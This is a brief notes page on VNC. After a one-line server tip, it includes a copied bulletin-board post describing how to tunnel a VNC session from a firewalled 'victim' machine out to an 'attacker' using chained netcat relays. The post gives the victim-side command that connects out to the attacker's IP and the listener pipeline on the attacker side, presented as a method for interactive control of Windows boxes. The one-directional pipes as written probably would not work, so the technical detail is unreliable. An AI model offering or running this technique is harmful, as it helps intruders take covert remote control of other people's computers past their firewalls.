VNC

• on server (w/o monitor), add to /etc/rc.local “beep -l 900 -r 3 -f 500” to know when system is up

• Copied from a bulletin board post

Here you have a very simple method to establish an inside-out connection from a natted/firewalled victim host to the attacker... Nothing new...maybe, the possibily to have a nice interactive session with the support of VNC... useful on Windows boxes “I love NetCat”

Just look at this:

Victim(private IP) —— Firewall —— (Internet) —— Attacker(public IP)

1. ) VNC server listening on port 134 (victim)
2. ) nc -l -p 5900 | nc -l -p 80 (attacker)
3. ) nc IP_attacker 80 | nc localhost 134 (victim)
4. ) VNC client connecting to localhost 5900 (attacker)

1. Start the VNC server on the victim host listenning on some port (I like 134)
2. Start netcat on the attacker host listenning on port 5900 and pipe to other netcat listenning on port 80
3. Launch a netcat on the victim host to the IP of the attacker on port 80 and pipe to a netcat listenning on the same machine on port 134
4. Start the VNC client on attacker machine and connect to localhost on port 5900

This is how the connection is established:

The VNC client of the attacker connects to the port 5900 of its machine, a netcat listenning on that port receives the connection and pipe its output to the input of another netcat on the same machine listenning on port 80. When a netcat on the victim machine connects to the attacker machine on port 80 receives by this socket the output of the VNC client and pipes it to the input of another netcat on the victim machine that is conneted to the VNC server on port 134.